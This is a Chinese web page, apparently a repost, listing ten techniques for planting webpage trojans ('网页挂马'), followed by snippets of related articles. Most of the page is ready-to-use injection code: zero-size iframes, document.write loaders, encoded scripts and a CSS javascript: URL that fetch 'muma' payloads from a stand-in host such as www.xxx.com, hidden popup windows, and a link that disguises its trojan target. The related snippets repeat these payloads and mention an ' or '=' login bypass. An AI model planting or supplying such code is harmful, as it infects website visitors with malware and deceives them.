网页挂马方式

一:框架挂马

    <iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

  首先将以下代码
  document.write("<iframe width=‘0‘ height=‘0‘ src=‘地址‘></iframe>");
  保存为xxx.js,
  则JS挂马代码为
  <script language=javascript src=xxx.js></script>

三:js变形加密

  <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
  muma.txt可改成任意后缀

四:body挂马

  <body ></body>

五:隐蔽挂马

  top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe src=";

六:css中挂马

  body { 
  background-image: url(‘javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")‘)}

七:js挂马

  <SCRIPT language=javascript> 
  window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
  </script>

八:图片伪装

  <html>
  <iframe src="网马地址" height=0 width=0></iframe>
  <img src="图片地址"></center>
  </html>

九:伪装调用:

  <frameset rows="444,0" cols="*">
  <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
  <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
  </frameset>

十:高级欺骗

  <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
  <SCRIPT Language="JavaScript">
  function www_163_com ()
  {
  var url="网马地址";
  open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

详见 网页挂马方法和技巧大汇总

网页挂马方式

时间: 2024-10-13 19:36:48

网页挂马方式的相关文章

如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的工作原理及种类.常见方式.执行方式.如何检测网页是否被挂马.如何清除网页木马.如何防止网页被挂马. 1:网页挂马工作原理的种类. (1)工作原理: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制.为达到目的首

利用登陆文件注入漏洞给网页挂马

本文操作方法十分简单,按照操作提示一步步来就可以完成了.不少网站在后台登陆框输入‘or’'='代码就可以直接登陆网站后台,这种方式曾经是最流行入侵方式,而今天卢松松讲的是如何利用login后台登陆文件漏洞注入代码. login.php(.asp/.aspx)文件一般都是作为CMS系统的管理员后台登陆文件,这里以PHP168CMS系统为例,login.php漏洞实际上的一个注入漏洞,是利用文件代码设计不良直接讲恶意代码直接上传到网站目录中.利用此漏洞可以进入网站,实行内容篡.网页挂马等手段. 第一

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

用go实现web日志分析及网页挂马关键字检测

本程序主要实现网页挂马关键字检测,原理是这样的,通过定时分析用户访问的IIS web日志,对日志的里的URL进行访问,然后检索是否包含相关的关键字,有就入库,这只是go实现自动检索及入库,可以加个前端,实现加关键及报警功能 package main import (     "bufio"     "code.google.com/p/mahonia"     "fmt"     "io"     "io/iouti

Web挂马方式整理

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加

揭秘几种最主要的挂马技术

网页挂马是攻击者惯用的入侵手段,其影响极其恶劣.不仅让站点管理者蒙羞,而且殃及池鱼使站点的浏览者遭殃.不管是站点维护者还是个人用户,掌握.了解一定的网页挂马及其防御技术是非常必要的. 1.关于网页挂马 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机. 2.获取Webshell 攻击者要进行网页挂马,必须要获取对站点文件的修改权限,而获取该站点Webshell是最普遍的做法.

放肆网络目测被黑被挂马,实战爆菊幕后黑手

今天在放肆网络论坛逛得时候,打开帖子发现一个木马下载弹窗,起初还以为是别的页面弹窗的,后来经验证确实是放肆网络论坛的估计是被挂马了吧~但是小编想吐槽的是:挂马不是这样挂的亲~目测小白...直接iframer....而且直接就用hfs下载地址,自己的服务器就暴露了,看了下hfs的版本信息,是2.3beta版本的,这个漏洞就不多说了,直接秒了~~上去后抓内存中的管理密码,结果登不上,蛋疼~直接给他改了密码~~<ignore_js_op> 如我所料,并没有人中木马,这种挂马方式是very very

wordpress网站被挂马以及防御方法

wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性.所以我们在日常维护自己的网站时,一定要注重网站的安全性,最大限度的防止网站被挂上木马. 一般来说,破解网站的途径是获取网站后台的管理员权限,从而进行修改网站文件,放置木马,这种方式是最为常见的也是最容易防御的. 防御这种破解的方式请确保做好以下的工作:? 1. 管理员账号尽量不要使用admin这种简单的用户名,密码使用

网页挂马方法和技巧大汇总

1,挂马的N种方法  (1) HTML挂马法.  常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>.查看站点是否被挂,一般是查找一下关键词iframe.  (2) 再隐藏一点的就是js挂马了.  像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script&g